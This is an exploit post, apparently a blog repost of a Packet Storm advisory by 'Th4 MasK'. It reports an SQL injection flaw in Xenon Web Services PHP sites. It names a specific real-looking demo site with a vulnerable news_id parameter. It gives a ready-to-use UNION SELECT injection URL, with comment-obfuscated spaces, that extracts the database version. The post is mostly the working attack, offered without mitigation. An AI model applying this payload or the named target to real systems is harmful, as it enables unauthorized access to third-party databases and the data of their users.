########################################################
~ Exploit Title: * Xenon Web Services SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Vendor: http://xe.co.za/
~ Date : 14.02.2012 ~
~ Platform : Php ~
########################################################
~ Demo Site :
~ www.kawasakisa.co.za/news_details.php?news_id=385 [SQL]
Exploit :
http://localhost/pview.php?id=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3,/**/4,/**/@@version,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13,/**/14,/**/15,/**/16,/**/17,/**/18,/**/19,/**/20,/**/21,/**/22--
########################################################
~* Bilinmezlik DiyarinDan
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
~* Email:th4_mask@windowslive.com~
~ Greetz: http://th4mask.blogspot.com ~ DarkdevilZ.in
########################################################
~ Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord
########################################################
http://packetstormsecurity.org/files/109795/Xenon-Web-Services-SQL-Injection.html
Hiç yorum yok:
Yorum Gönder